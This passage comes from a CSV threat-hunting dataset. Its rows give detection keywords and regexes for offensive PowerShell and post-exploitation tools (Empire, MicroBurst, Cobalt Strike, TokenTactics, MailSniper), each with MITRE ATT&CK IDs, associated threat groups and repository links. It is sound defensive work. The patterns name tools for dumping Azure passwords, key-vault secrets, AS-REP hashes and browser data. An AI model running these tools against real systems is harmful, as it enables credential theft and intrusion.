TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45873" "*Get-AndDisplayInformation -ClassName ""Win32_LocalTime""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_LocalTime\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45874" "*Get-AndDisplayInformation -ClassName ""Win32_LogicalDisk"" -PropertyFilter DeviceID,DriveType,ProviderName,VolumeName,Size,FreeSpace,PSComputerName*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_LogicalDisk\""\s\-PropertyFilter\sDeviceID,DriveType,ProviderName,VolumeName,Size,FreeSpace,PSComputerName.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45875" "*Get-AndDisplayInformation -ClassName ""Win32_LogonSession""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_LogonSession\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45876" "*Get-AndDisplayInformation -ClassName ""Win32_OperatingSystem"" 
-PropertyFilter Build*,OSType,ServicePack**",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_OperatingSystem\""\s\-PropertyFilter\sBuild.{0,1000},OSType,ServicePack.{0,1000}.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45877" "*Get-AndDisplayInformation -ClassName ""Win32_OperatingSystem"" -PropertyFilter user*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_OperatingSystem\""\s\-PropertyFilter\suser.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45878" "*Get-AndDisplayInformation -ClassName ""Win32_Processor"" -PropertyFilter **",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_Processor\""\s\-PropertyFilter\s.{0,1000}.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45879" "*Get-AndDisplayInformation -ClassName ""Win32_QuickFixEngineering"" -PropertyFilter HotFixId*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_QuickFixEngineering\""\s\-PropertyFilter\sHotFixId.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - 
T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45880" "*Get-AndDisplayInformation -ClassName ""Win32_Service"" -PropertyFilter Status,Name,DisplayName*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_Service\""\s\-PropertyFilter\sStatus,Name,DisplayName.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45881" "*Get-AppLockerConfig.ps1*",".{0,1000}Get\-AppLockerConfig\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - 
CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45882" "*Get-ASREPHash*",".{0,1000}Get\-ASREPHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45884" "*Get-Attack -term *",".{0,1000}Get\-Attack\s\-term\s.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","45885" "*Get-AzAutomationAccountCredsREST.ps1*",".{0,1000}Get\-AzAutomationAccountCredsREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45886" "*Get-AzDomainInfo*",".{0,1000}Get\-AzDomainInfo.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation 
tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45887" "*Get-AzDomainInfoREST.ps1*",".{0,1000}Get\-AzDomainInfoREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45888" "*Get-AzKeyVaultKeysREST.ps1*",".{0,1000}Get\-AzKeyVaultKeysREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45889" "*Get-AzKeyVaultSecretsREST.ps1*",".{0,1000}Get\-AzKeyVaultSecretsREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45890" "*Get-AzPasswords*",".{0,1000}Get\-AzPasswords.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45891" "*Get-AZStorageKeysREST.ps1*",".{0,1000}Get\-AZStorageKeysREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - 
T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45892" "*Get-AzureADDomainInfo*",".{0,1000}Get\-AzureADDomainInfo.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45893" "*Get-AzureADDomainInfo.ps1*",".{0,1000}Get\-AzureADDomainInfo\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45894" "*Get-AzureADUsers *",".{0,1000}Get\-AzureADUsers\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Gets user directory","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","45895" "*Get-AzurePasswords*",".{0,1000}Get\-AzurePasswords.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45896" "*Get-AzureTokenFromESTSCookie 
*",".{0,1000}Get\-AzureTokenFromESTSCookie\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","45897" "*Get-AzureTokenFromESTSCookie -ESTSAuthCookie *",".{0,1000}Get\-AzureTokenFromESTSCookie\s\-ESTSAuthCookie\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","45898" "*Get-AzUserAssignedIdentity*",".{0,1000}Get\-AzUserAssignedIdentity.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45899" "*Get-BaseLineResponseTimeEAS*",".{0,1000}Get\-BaseLineResponseTimeEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","45900" "*Get-BeaconAPI*",".{0,1000}Get\-BeaconAPI.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","45901" "*GetBearerToken.exe https://*.sharepoint.com*",".{0,1000}GetBearerToken\.exe\shttps\:\/\/.{0,1000}\.sharepoint\.com.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","45902" "*Get-BloodHoundData*",".{0,1000}Get\-BloodHoundData.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SPN.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45903" "*Get-BootKey*",".{0,1000}Get\-BootKey.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45904" "*Get-BrowserData.ps1*",".{0,1000}Get\-BrowserData\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45905" "*Get-BrowserInformation*",".{0,1000}Get\-BrowserInformation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45906" "*GetC2Server*",".{0,1000}GetC2Server.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45907" "*Get-CachedGPPPassword*",".{0,1000}Get\-CachedGPPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45908" "*Get-CachedRDPConnection*",".{0,1000}Get\-CachedRDPConnection.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45909" "*Get-CachedRDPConnection*",".{0,1000}Get\-CachedRDPConnection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
